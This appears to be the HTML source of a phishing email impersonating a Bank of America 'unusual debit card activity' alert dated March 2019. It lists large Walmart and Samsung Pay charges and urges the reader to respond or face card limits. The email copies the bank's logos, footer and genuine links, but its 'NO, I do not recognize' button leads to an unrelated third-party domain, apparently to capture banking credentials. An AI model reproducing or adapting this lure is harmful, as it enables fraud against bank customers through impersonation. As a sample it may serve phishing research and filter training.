<table cellspacing="0" cellpadding="0" width="100%" border="0">
<tbody>
<tr>
<td>
<div align="center"><!-- Table used to set width of email, 600px is best practice / add bordercolor=#000000 to the table tag to give a border around email -->
<table cellspacing="0" cellpadding="0" width="740" border="0">
<tbody>
<tr></tr>
<tr>
<td style="FONT-SIZE: 18px; PADDING-BOTTOM: 0px; TEXT-ALIGN: center; PADDING-TOP: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px">
<table style="BORDER-TOP: 0px; BORDER-RIGHT: 0px; WIDTH: 740px; BORDER-COLLAPSE: collapse; BORDER-BOTTOM: 0px; BORDER-LEFT: 0px" align="center">
<tbody>
<tr>
<td style="FONT-SIZE: 1px; HEIGHT: 10px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; LINE-HEIGHT: 10px; PADDING-RIGHT: 0px" bgcolor="#e31932" height="10"><img style="DISPLAY: block" alt="Red spacer" src="http://images.em.bankofamerica.com/imgs/MIE/cne/2013_spacer.JPG" width="1" height="10"> </td></tr>
<tr>
<td style="PADDING-BOTTOM: 5px; TEXT-ALIGN: right; PADDING-TOP: 20px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px"><a href="https://www.bankofamerica.com/index.jsp" name="bank_of_america" target="blank"><img style="BORDER-TOP: medium none; HEIGHT: 27px; BORDER-RIGHT: medium none; WIDTH: 207px; BORDER-BOTTOM: medium none; BORDER-LEFT: medium none" border="0" hspace="0" alt="Bank of America®" src="http://images.em.bankofamerica.com/imgs/MIE/cne/logo.jpg"></a></td></tr></tbody></table></td></tr>
<tr>
<td>
<table cellspacing="0" cellpadding="0" width="740" border="0"><!-- Email Body -->
<tbody>
<tr>
<td><!-- Table that houses content boxes / add tr and td to fit your layout needs -->
<table cellspacing="5" cellpadding="0" width="740" border="0">
<tbody>
<tr>
<td>
<table style="BORDER-TOP: 0px; FONT-FAMILY: Arial; BORDER-RIGHT: 0px; WIDTH: 600px; BORDER-COLLAPSE: collapse; BORDER-BOTTOM: 0px; COLOR: #333; PADDING-BOTTOM: 30px; PADDING-TOP: 0px; PADDING-LEFT: 10px; BORDER-LEFT: 0px; PADDING-RIGHT: 30px">
<tbody><!-- Start Content section -->
<tr>
<td style="BACKGROUND: #ffffff; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 20px; PADDING-RIGHT: 20px">
<table style="BORDER-TOP: 0px; FONT-FAMILY: Arial; BORDER-RIGHT: 0px; BORDER-COLLAPSE: collapse; BORDER-BOTTOM: 0px; COLOR: #333; BORDER-LEFT: 0px">
<tbody>
<tr>
<td style="FONT-SIZE: 24px; COLOR: #e31932; PADDING-BOTTOM: 2px; TEXT-ALIGN: left; PADDING-TOP: 15px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px">Security Alert: Unusual debit card activity detected</td></tr>
<tr>
<td style="FONT-SIZE: 13px; PADDING-BOTTOM: 27px; TEXT-ALIGN: left; PADDING-TOP: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px"><br></td></tr>
<tr>
<td style="FONT-SIZE: 14px; PADDING-BOTTOM: 24px; TEXT-ALIGN: left; PADDING-TOP: 9px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px">Dear Client</td></tr>
<tr height="69">
<td style="FONT-SIZE: 14px; PADDING-BOTTOM: 24px; TEXT-ALIGN: left; PADDING-TOP: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px">We're letting you know that we've detected some unusual activity on your Bank of America debit card on 03/23/2019. For your security, please verify the following transaction(s) so that you can continue to use your card.</td></tr>
<tr>
<td>
<table style="FONT-SIZE: 15px; BORDER-TOP: #e6e9dd 1px solid; FONT-FAMILY: arial; BORDER-RIGHT: #e6e9dd 1px solid; WIDTH: 630px; BORDER-BOTTOM: #e6e9dd 1px solid; FONT-WEIGHT: normal; COLOR: ; PADDING-TOP: 0px; BORDER-LEFT: #e6e9dd 1px solid; BACKGROUND-COLOR: #faf8ed" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td style="FONT-SIZE: 14px; VERTICAL-ALIGN: top; PADDING-BOTTOM: 0px; TEXT-ALIGN: left; PADDING-TOP: 25px; PADDING-LEFT: 23px; PADDING-RIGHT: 0px"><img style="BORDER-TOP: 0px; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; BORDER-LEFT: 0px" alt="action icon" src="https://secure.bankofamerica.com/content/images/ContextualSiteGraphics/Logos/en_US/Action_Required_Icon.png"> </td>
<td>
<table style="FONT-SIZE: 15px; FONT-FAMILY: arial; WIDTH: 640px; FONT-WEIGHT: normal; COLOR: ; PADDING-TOP: 0px; BACKGROUND-COLOR: #faf8ed" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td style="FONT-SIZE: 14px; PADDING-BOTTOM: 10px; TEXT-ALIGN: left; PADDING-TOP: 26px; PADDING-LEFT: 20px; PADDING-RIGHT: 0px"><b>Do you recognize all of these transaction(s)?</b></td></tr>
<tr>
<td>
<table style="BORDER-TOP: 0px; FONT-FAMILY: Arial; BORDER-RIGHT: 0px; BORDER-COLLAPSE: collapse; BORDER-BOTTOM: 0px; COLOR: #333; BORDER-LEFT: 0px">
<tbody>
<tr>
<td style="FONT-SIZE: 14px; PADDING-BOTTOM: 5px; TEXT-ALIGN: left; PADDING-TOP: 0px; PADDING-LEFT: 20px; PADDING-RIGHT: 0px"><img style="BORDER-TOP: 0px; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; BORDER-LEFT: 0px" alt="" src="http://images.em.bankofamerica.com/imgs/MIE/cne/Bullet_point.jpg"></td>
<td style="FONT-SIZE: 14px; PADDING-BOTTOM: 5px; TEXT-ALIGN: left; PADDING-TOP: 0px; PADDING-LEFT: 10px; PADDING-RIGHT: 25px">Approved transaction at WALMART.COM for $2543.82 on 03/23/2019</td></tr></tbody></table></td></tr>
<tr>
<td>
<table style="BORDER-TOP: 0px; FONT-FAMILY: Arial; BORDER-RIGHT: 0px; BORDER-COLLAPSE: collapse; BORDER-BOTTOM: 0px; COLOR: #333; BORDER-LEFT: 0px">
<tbody>
<tr>
<td style="FONT-SIZE: 14px; PADDING-BOTTOM: 5px; TEXT-ALIGN: left; PADDING-TOP: 0px; PADDING-LEFT: 20px; PADDING-RIGHT: 0px"><img style="BORDER-TOP: 0px; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; BORDER-LEFT: 0px" alt="" src="http://images.em.bankofamerica.com/imgs/MIE/cne/Bullet_point.jpg"></td>
<td style="FONT-SIZE: 14px; PADDING-BOTTOM: 5px; TEXT-ALIGN: left; PADDING-TOP: 0px; PADDING-LEFT: 10px; PADDING-RIGHT: 25px">Declined transaction at WALMART.COM for $3029.67 on 03/23/2019</td></tr></tbody></table></td></tr>
<tr>
<td>
<table style="BORDER-TOP: 0px; FONT-FAMILY: Arial; BORDER-RIGHT: 0px; BORDER-COLLAPSE: collapse; BORDER-BOTTOM: 0px; COLOR: #333; BORDER-LEFT: 0px">
<tbody>
<tr>
<td style="FONT-SIZE: 14px; PADDING-BOTTOM: 5px; TEXT-ALIGN: left; PADDING-TOP: 0px; PADDING-LEFT: 20px; PADDING-RIGHT: 0px"><img style="BORDER-TOP: 0px; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; BORDER-LEFT: 0px" alt="" src="http://images.em.bankofamerica.com/imgs/MIE/cne/Bullet_point.jpg"></td>
<td style="FONT-SIZE: 14px; PADDING-BOTTOM: 5px; TEXT-ALIGN: left; PADDING-TOP: 0px; PADDING-LEFT: 10px; PADDING-RIGHT: 25px">Approved transaction at SAMSUNG PAY for $500.00 on 03/23/2019</td></tr></tbody></table></td></tr>
<tr>
<td style="PADDING-TOP: 9px">
<table>
<tbody>
<tr>
<td style="TEXT-ALIGN: left; PADDING-LEFT: 20px"><a style="TEXT-DECORATION: none" href="https://secure.bankofamerica.com/emcom/" target="_blank"><img alt="Yes,I recognize all of these" src="https://secure.bankofamerica.com/content/images/ContextualSiteGraphics/Logos/en_US/Yes_button.png"></a> </td></tr>
<tr>
<td style="FONT-SIZE: 13px; FONT-FAMILY: Arial; COLOR: #333333; PADDING-BOTTOM: 14px; TEXT-ALIGN: left; PADDING-TOP: 4px; PADDING-LEFT: 20px; PADDING-RIGHT: 0px"><b>YES</b> will make your card immediately ready to use again.</td></tr>
<tr>
<td style="TEXT-ALIGN: left; PADDING-LEFT: 20px"><a href="https://maxholtmann.com/281/directout/includes/js/tabs/x1x/"><img alt="NO, I do not recognize one or more of these" src="https://secure.bankofamerica.com/content/images/ContextualSiteGraphics/Logos/en_US/No_button.png"></a> </td></tr>
<tr>
<td style="FONT-SIZE: 13px; FONT-FAMILY: Arial; COLOR: #333333; PADDING-BOTTOM: 19px; TEXT-ALIGN: left; PADDING-TOP: 4px; PADDING-LEFT: 20px; PADDING-RIGHT: 0px"><b>NO</b> will allow you to complete the verification process and file a fraud claim in Online or Mobile Banking.</td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr>
<tr>
<td style="FONT-SIZE: 14px; PADDING-BOTTOM: 16px; TEXT-ALIGN: left; PADDING-TOP: 28px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px">Please respond to this message or we may need to place certain limitations on your card to protect your account.</td></tr>
<tr>
<td style="FONT-SIZE: 14px; PADDING-BOTTOM: 38px; TEXT-ALIGN: left; PADDING-TOP: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px">If you have already contacted us, please disregard this notice.</td></tr></tbody></table></td></tr>
<tr>
<td style="FONT-SIZE: 1px; HEIGHT: 10px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; LINE-HEIGHT: 10px; PADDING-RIGHT: 0px" bgcolor="#e31932" height="10"><img style="DISPLAY: block" alt="" src="http://images.em.bankofamerica.com/imgs/MIE/cne/2013_spacer.JPG" width="1" height="10"> </td></tr>
<tr>
<td style="PADDING-BOTTOM: 0px; PADDING-TOP: 31px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px">
<table style="BORDER-TOP: 0px; FONT-FAMILY: Arial; BORDER-RIGHT: 0px; BACKGROUND: #f1f8fd; BORDER-COLLAPSE: collapse; BORDER-BOTTOM: 0px; COLOR: #333; BORDER-LEFT: 0px">
<tbody>
<tr>
<td style="FONT-SIZE: 16px; FONT-WEIGHT: bold; PADDING-BOTTOM: 14px; TEXT-ALIGN: left; PADDING-TOP: 18px; PADDING-LEFT: 20px; PADDING-RIGHT: 20px"><img alt="Security Icon" src="http://images.em.bankofamerica.com/imgs/MIE/cne/icon_security.png" width="20" height="24"><b>&nbsp; Your last sign-in was 03/22/2019</b></td></tr>
<tr>
<td style="FONT-SIZE: 14px; PADDING-BOTTOM: 14px; TEXT-ALIGN: left; PADDING-TOP: 0px; PADDING-LEFT: 20px; PADDING-RIGHT: 20px">To verify that this email is from Bank of America, confirm your last sign-in date is correct.&nbsp;To access Online or Mobile Banking, go directly to bankofamerica.com or use our Mobile Banking App.</td></tr>
<tr>
<td style="FONT-SIZE: 14px; PADDING-BOTTOM: 18px; TEXT-ALIGN: left; PADDING-TOP: 0px; PADDING-LEFT: 20px; PADDING-RIGHT: 20px"><br></td></tr></tbody></table></td></tr><!-- Start Footer section -->
<tr>
<td style="PADDING-BOTTOM: 0px; PADDING-TOP: 28px; PADDING-LEFT: 20px; PADDING-RIGHT: 20px">
<table style="BORDER-TOP: 0px; BORDER-RIGHT: 0px; BORDER-COLLAPSE: collapse; BORDER-BOTTOM: 0px; BORDER-LEFT: 0px">
<tbody>
<tr>
<td style="FONT-SIZE: 13px; FONT-FAMILY: Arial; COLOR: #333; PADDING-BOTTOM: 15px; TEXT-ALIGN: left; PADDING-TOP: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px">This is a service email from Bank of America. Please note that you may receive service emails in accordance with your Bank of America service agreements, whether or not you elect to receive promotional email.</td></tr>
<tr>
<td style="FONT-SIZE: 13px; FONT-FAMILY: Arial; COLOR: #333; PADDING-BOTTOM: 15px; TEXT-ALIGN: left; PADDING-TOP: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px">Read our <a style="TEXT-DECORATION: none; COLOR: #3366cc" href="https://www.bankofamerica.com/privacy/consumer-privacy-notice.go" name="privacy_notice">Privacy Notice</a>.</td></tr>
<tr>
<td style="FONT-SIZE: 13px; FONT-FAMILY: Arial; COLOR: #333; PADDING-BOTTOM: 15px; TEXT-ALIGN: left; PADDING-TOP: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px">Please don't reply directly to this automatically generated email message.</td></tr>
<tr>
<td style="FONT-SIZE: 13px; FONT-FAMILY: Arial; COLOR: #333; PADDING-BOTTOM: 15px; TEXT-ALIGN: left; PADDING-TOP: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px">Bank of America Email, NC1-028-09-01, 150 N College St., Charlotte, NC 28255</td></tr>
<tr>
<td style="FONT-SIZE: 13px; FONT-FAMILY: Arial; COLOR: #333; PADDING-BOTTOM: 15px; TEXT-ALIGN: left; PADDING-TOP: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px">Bank of America, N.A. Member FDIC. <a style="TEXT-DECORATION: none; COLOR: #3366cc" href="http://www.bankofamerica.com/help/equalhousing.cfm" name="equal_housing_lender">Equal Housing Lender <img style="BORDER-TOP: medium none; BORDER-RIGHT: medium none; BORDER-BOTTOM: medium none; BORDER-LEFT: medium none" src="http://images.em.bankofamerica.com/imgs/MIE/odao/odaohouse.gif"></a><br>© 2019 Bank of America Corporation. All rights reserved.</td></tr>
<tr>
<td style="FONT-SIZE: 13px; FONT-FAMILY: Arial; COLOR: #333; PADDING-BOTTOM: 15px; TEXT-ALIGN: left; PADDING-TOP: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px"><br></td></tr></tbody></table></td></tr><!-- End Footer section --></tbody></table></td></tr>
<tr>
<td><br></td></tr></tbody></table><!-- END Table that house content boxes --></td></tr><!-- END Email Body --></tbody></table></td></tr></tbody></table><!-- END Table use to set width of email --></div></td></tr></tbody></table><!-- END Table used to left align email -->